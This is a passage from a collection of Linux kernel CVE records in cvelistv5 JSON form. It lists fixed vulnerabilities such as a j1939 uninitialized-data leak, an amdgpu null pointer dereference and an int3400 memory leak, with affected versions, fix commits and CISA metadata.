entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nUninit was created at:\n slab_post_alloc_hook mm/slub.c:3804 [inline]\n slab_alloc_node mm/slub.c:3845 [inline]\n kmem_cache_alloc_node+0x613/0xc50 mm/slub.c:3888\n kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:577\n __alloc_skb+0x35b/0x7a0 net/core/skbuff.c:668\n alloc_skb include/linux/skbuff.h:1313 [inline]\n alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6504\n sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2795\n sock_alloc_send_skb include/net/sock.h:1842 [inline]\n j1939_sk_alloc_skb net/can/j1939/socket.c:878 [inline]\n j1939_sk_send_loop net/can/j1939/socket.c:1142 [inline]\n j1939_sk_sendmsg+0xc0a/0x2730 net/can/j1939/socket.c:1277\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x30f/0x380 net/socket.c:745\n ____sys_sendmsg+0x877/0xb60 net/socket.c:2584\n ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638\n __sys_sendmsg net/socket.c:2667 [inline]\n __do_sys_sendmsg net/socket.c:2676 [inline]\n __se_sys_sendmsg net/socket.c:2674 [inline]\n __x64_sys_sendmsg+0x307/0x4a0 net/socket.c:2674\n x64_sys_call+0xc4b/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:47\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nBytes 12-15 of 16 are uninitialized\nMemory access of size 16 starts at ffff888120969690\nData copied to user address 00000000200017c0\n\nCPU: 1 PID: 5050 Comm: syz-executor198 Not tainted 6.9.0-rc5-syzkaller-00031-g71b1543c83d6 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:27.050Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5e4ed38eb17eaca42de57d500cc0f9668d2b6abf"
},
{
"url": "https://git.kernel.org/stable/c/a2a0ebff7fdeb2f66e29335adf64b9e457300dd4"
},
{
"url": "https://git.kernel.org/stable/c/4c5dc3927e17489c1cae6f48c0d5e4acb4cae01f"
},
{
"url": "https://git.kernel.org/stable/c/f97cbce633923588307049c4aef9feb2987e371b"
},
{
"url": "https://git.kernel.org/stable/c/ab2a683938ba4416d389c2f5651cbbb2c41b779f"
},
{
"url": "https://git.kernel.org/stable/c/ba7e5ae8208ac07d8e1eace0951a34c169a2d298"
},
{
"url": "https://git.kernel.org/stable/c/b7cdf1dd5d2a2d8200efd98d1893684db48fe134"
}
],
"title": "net: can: j1939: Initialize unused data in j1939_send_one()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42076",
"datePublished": "2024-07-29T15:52:38.981Z",
"dateReserved": "2024-07-29T15:50:41.169Z",
"dateUpdated": "2025-05-04T09:22:27.050Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43907 (GCVE-0-2024-43907)
Vulnerability from cvelistv5
Published
2024-08-26 10:11
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/pm: Fix the null pointer dereference in apply_state_adjust_rules
Check the pointer value to fix potential null pointer
dereference
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43907",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:28:30.301446Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:07.438Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c",
"drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c",
"drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c1749313f35b98e2e655479f037db37f19756622",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0c065e50445aea2e0a1815f12e97ee49e02cbaac",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e04d18c29954441aa1054af649f957ffad90a201",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3a01bf2ca9f860fdc88c358567b8fa3033efcf30",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "13937a40aae4efe64592ba48c057ac3c72f7fe82",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d19fb10085a49b77578314f69fff21562f7cd054",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c",
"drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c",
"drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu/pm: Fix the null pointer dereference in apply_state_adjust_rules\n\nCheck the pointer value to fix potential null pointer\ndereference"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:58.254Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c1749313f35b98e2e655479f037db37f19756622"
},
{
"url": "https://git.kernel.org/stable/c/0c065e50445aea2e0a1815f12e97ee49e02cbaac"
},
{
"url": "https://git.kernel.org/stable/c/e04d18c29954441aa1054af649f957ffad90a201"
},
{
"url": "https://git.kernel.org/stable/c/3a01bf2ca9f860fdc88c358567b8fa3033efcf30"
},
{
"url": "https://git.kernel.org/stable/c/13937a40aae4efe64592ba48c057ac3c72f7fe82"
},
{
"url": "https://git.kernel.org/stable/c/d19fb10085a49b77578314f69fff21562f7cd054"
}
],
"title": "drm/amdgpu/pm: Fix the null pointer dereference in apply_state_adjust_rules",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43907",
"datePublished": "2024-08-26T10:11:09.800Z",
"dateReserved": "2024-08-17T09:11:59.293Z",
"dateUpdated": "2025-05-04T09:28:58.254Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48924 (GCVE-0-2022-48924)
Vulnerability from cvelistv5
Published
2024-08-22 01:33
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
thermal: int340x: fix memory leak in int3400_notify()
It is easy to hit the below memory leaks in my TigerLake platform:
unreferenced object 0xffff927c8b91dbc0 (size 32):
comm "kworker/0:2", pid 112, jiffies 4294893323 (age 83.604s)
hex dump (first 32 bytes):
4e 41 4d 45 3d 49 4e 54 33 34 30 30 20 54 68 65 NAME=INT3400 The
72 6d 61 6c 00 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5 rmal.kkkkkkkkkk.
backtrace:
[<ffffffff9c502c3e>] __kmalloc_track_caller+0x2fe/0x4a0
[<ffffffff9c7b7c15>] kvasprintf+0x65/0xd0
[<ffffffff9c7b7d6e>] kasprintf+0x4e/0x70
[<ffffffffc04cb662>] int3400_notify+0x82/0x120 [int3400_thermal]
[<ffffffff9c8b7358>] acpi_ev_notify_dispatch+0x54/0x71
[<ffffffff9c88f1a7>] acpi_os_execute_deferred+0x17/0x30
[<ffffffff9c2c2c0a>] process_one_work+0x21a/0x3f0
[<ffffffff9c2c2e2a>] worker_thread+0x4a/0x3b0
[<ffffffff9c2cb4dd>] kthread+0xfd/0x130
[<ffffffff9c201c1f>] ret_from_fork+0x1f/0x30
Fix it by calling kfree() accordingly.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 38e44da591303d08b0d965a033e11ade284999d0 Version: 38e44da591303d08b0d965a033e11ade284999d0 Version: 38e44da591303d08b0d965a033e11ade284999d0 Version: 38e44da591303d08b0d965a033e11ade284999d0 Version: 38e44da591303d08b0d965a033e11ade284999d0 Version: 38e44da591303d08b0d965a033e11ade284999d0 Version: 38e44da591303d08b0d965a033e11ade284999d0 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48924",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:18.769606Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:00.629Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/thermal/intel/int340x_thermal/int3400_thermal.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f0ddc5184b0127038d05008e2a69f89d1e13f980",
"status": "affected",
"version": "38e44da591303d08b0d965a033e11ade284999d0",
"versionType": "git"
},
{
"lessThan": "c3fa6d1937a8d0828131a04ae2cd2c30d0668693",
"status": "affected",
"version": "38e44da591303d08b0d965a033e11ade284999d0",
"versionType": "git"
},
{
"lessThan": "2e798814e01827871938ff172d2b2ccf1e74b355",
"status": "affected",
"version": "38e44da591303d08b0d965a033e11ade284999d0",
"versionType": "git"
},
{
"lessThan": "e098933866f9e1dd3ef4eebbe2e3d504f970f599",
"status": "affected",
"version": "38e44da591303d08b0d965a033e11ade284999d0",
"versionType": "git"
},
{
"lessThan": "ba9efbbf6745750d34c1e87c9539ce9db645ca0a",
"status": "affected",
"version": "38e44da591303d08b0d965a033e11ade284999d0",
"versionType": "git"
},
{
"lessThan": "33c73a4d7e7b19313a6b417152f5365016926418",
"status": "affected",
"version": "38e44da591303d08b0d965a033e11ade284999d0",
"versionType": "git"
},
{
"lessThan": "3abea10e6a8f0e7804ed4c124bea2d15aca977c8",
"status": "affected",
"version": "38e44da591303d08b0d965a033e11ade284999d0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/thermal/intel/int340x_thermal/int3400_thermal.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.237",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.188",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.274",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.237",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.188",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nthermal: int340x: fix memory leak in int3400_notify()\n\nIt is easy to hit the below memory leaks in my TigerLake platform:\n\nunreferenced object 0xffff927c8b91dbc0 (size 32):\n comm \"kworker/0:2\", pid 112, jiffies 4294893323 (age 83.604s)\n hex dump (first 32 bytes):\n 4e 41 4d 45 3d 49 4e 54 33 34 30 30 20 54 68 65 NAME=INT3400 The\n 72 6d 61 6c 00 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5 rmal.kkkkkkkkkk.\n backtrace:\n [\u003cffffffff9c502c3e\u003e] __kmalloc_track_caller+0x2fe/0x4a0\n [\u003cffffffff9c7b7c15\u003e] kvasprintf+0x65/0xd0\n [\u003cffffffff9c7b7d6e\u003e] kasprintf+0x4e/0x70\n [\u003cffffffffc04cb662\u003e] int3400_notify+0x82/0x120 [int3400_thermal]\n [\u003cffffffff9c8b7358\u003e] acpi_ev_notify_dispatch+0x54/0x71\n [\u003cffffffff9c88f1a7\u003e] acpi_os_execute_deferred+0x17/0x30\n [\u003cffffffff9c2c2c0a\u003e] process_one_work+0x21a/0x3f0\n [\u003cffffffff9c2c2e2a\u003e] worker_thread+0x4a/0x3b0\n [\u003cffffffff9c2cb4dd\u003e] kthread+0xfd/0x130\n [\u003cffffffff9c201c1f\u003e] ret_from_fork+0x1f/0x30\n\nFix it by calling kfree() accordingly."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:12.248Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f0ddc5184b0127038d05008e2a69f89d1e13f980"
},
{
"url": "https://git.kernel.org/stable/c/c3fa6d1937a8d0828131a04ae2cd2c30d0668693"
},
{
"url": "https://git.kernel.org/stable/c/2e798814e01827871938ff172d2b2ccf1e74b355"
},
{
"url": "https://git.kernel.org/stable/c/e098933866f9e1dd3ef4eebbe2e3d504f970f599"
},
{
"url": "https://git.kernel.org/stable/c/ba9efbbf6745750d34c1e87c9539ce9db645ca0a"
},
{
"url": "https://git.kernel.org/stable/c/33c73a4d7e7b19313a6b417152f5365016926418"
},
{
"url": "https://git.kernel.org/stable/c/3abea10e6a8f0e7804ed4c124bea2d15aca977c8"
}
],
"title": "thermal: int340x: fix memory leak in int3400_notify()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48924",
"datePublished": "2024-08-22T01:33:05.770Z",
"dateReserved": "2024-08-21T06:06:23.296Z",
"dateUpdated": "2025-05-04T08:26:12.248Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48883 (GCVE-0-2022-48883)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5e: IPoIB, Block PKEY interfaces with less rx queues than parent
A user is able to configure an arbitrary number of rx queues when
creating an interface via netlink. This doesn't work for child PKEY
interfaces because the child interface uses the parent receive channels.
Although the child shares the parent's receive channels, the number of
rx queues is important for the channel_stats array: the parent's rx
channel index is used to access the child's channel_stats. So the array
has to be at least as large as the parent's rx queue size for the
counting to work correctly and to prevent out of bound accesses.
This patch checks for the mentioned scenario and returns an error when
trying to create the interface. The error is propagated to the user.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48883",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:49.165689Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:52.439Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib_vlan.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5844a46f09f768da866d6b0ffbf1a9073266bf24",
"status": "affected",
"version": "be98737a4faa3a0dc1781ced5bbf5c47865e29d7",
"versionType": "git"
},
{
"lessThan": "31c70bfe58ef09fe36327ddcced9143a16e9e83d",
"status": "affected",
"version": "be98737a4faa3a0dc1781ced5bbf5c47865e29d7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib_vlan.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.17"
},
{
"lessThan": "5.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: IPoIB, Block PKEY interfaces with less rx queues than parent\n\nA user is able to configure an arbitrary number of rx queues when\ncreating an interface via netlink. This doesn\u0027t work for child PKEY\ninterfaces because the child interface uses the parent receive channels.\n\nAlthough the child shares the parent\u0027s receive channels, the number of\nrx queues is important for the channel_stats array: the parent\u0027s rx\nchannel index is used to access the child\u0027s channel_stats. So the array\nhas to be at least as large as the parent\u0027s rx queue size for the\ncounting to work correctly and to prevent out of bound accesses.\n\nThis patch checks for the mentioned scenario and returns an error when\ntrying to create the interface. The error is propagated to the user."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:25.926Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5844a46f09f768da866d6b0ffbf1a9073266bf24"
},
{
"url": "https://git.kernel.org/stable/c/31c70bfe58ef09fe36327ddcced9143a16e9e83d"
}
],
"title": "net/mlx5e: IPoIB, Block PKEY interfaces with less rx queues than parent",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48883",
"datePublished": "2024-08-21T06:10:14.763Z",
"dateReserved": "2024-07-16T11:38:08.924Z",
"dateUpdated": "2025-05-04T08:25:25.926Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38662 (GCVE-0-2024-38662)
Vulnerability from cvelistv5
Published
2024-06-21 11:15
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Allow delete from sockmap/sockhash only if update is allowed
We have seen an influx of syzkaller reports where a BPF program attached to
a tracepoint triggers a locking rule violation by performing a map_delete
on a sockmap/sockhash.
We don't intend to support this artificial use scenario. Extend the
existing verifier allowed-program-type check for updating sockmap/sockhash
to also cover deleting from a map.
From now on only BPF programs which were previously allowed to update
sockmap/sockhash can delete from these map types.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: dd54b48db0c822ae7b520bc80751f0a0a173ef75 Version: d1e73fb19a4c872d7a399ad3c66e8ca30e0875ec Version: a44770fed86515eedb5a7c00b787f847ebb134a5 Version: 668b3074aa14829e2ac2759799537a93b60fef86 Version: ff91059932401894e6c86341915615c5eb0eca48 Version: ff91059932401894e6c86341915615c5eb0eca48 Version: f7990498b05ac41f7d6a190dc0418ef1d21bf058 Version: 6af057ccdd8e7619960aca1f0428339f213b31cd |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38662",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T13:43:09.177225Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T13:43:19.909Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:12:26.024Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/29467edc23818dc5a33042ffb4920b49b090e63d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/11e8ecc5b86037fec43d07b1c162e233e131b1d9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6693b172f008846811f48a099f33effc26068e1e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/000a65bf1dc04fb2b65e2abf116f0bc0fc2ee7b1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b81e1c5a3c70398cf76631ede63a03616ed1ba3c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98e948fb60d41447fd8d2d0c3b8637fc6b6dc26d"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/verifier.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "29467edc23818dc5a33042ffb4920b49b090e63d",
"status": "affected",
"version": "dd54b48db0c822ae7b520bc80751f0a0a173ef75",
"versionType": "git"
},
{
"lessThan": "11e8ecc5b86037fec43d07b1c162e233e131b1d9",
"status": "affected",
"version": "d1e73fb19a4c872d7a399ad3c66e8ca30e0875ec",
"versionType": "git"
},
{
"lessThan": "6693b172f008846811f48a099f33effc26068e1e",
"status": "affected",
"version": "a44770fed86515eedb5a7c00b787f847ebb134a5",
"versionType": "git"
},
{
"lessThan": "000a65bf1dc04fb2b65e2abf116f0bc0fc2ee7b1",
"status": "affected",
"version": "668b3074aa14829e2ac2759799537a93b60fef86",
"versionType": "git"
},
{
"lessThan": "b81e1c5a3c70398cf76631ede63a03616ed1ba3c",
"status": "affected",
"version": "ff91059932401894e6c86341915615c5eb0eca48",
"versionType": "git"
},
{
"lessThan": "98e948fb60d41447fd8d2d0c3b8637fc6b6dc26d",
"status": "affected",
"version": "ff91059932401894e6c86341915615c5eb0eca48",
"versionType": "git"
},
{
"status": "affected",
"version": "f7990498b05ac41f7d6a190dc0418ef1d21bf058",
"versionType": "git"
},
{
"status": "affected",
"version": "6af057ccdd8e7619960aca1f0428339f213b31cd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/verifier.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.9"
},
{
"lessThan": "6.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
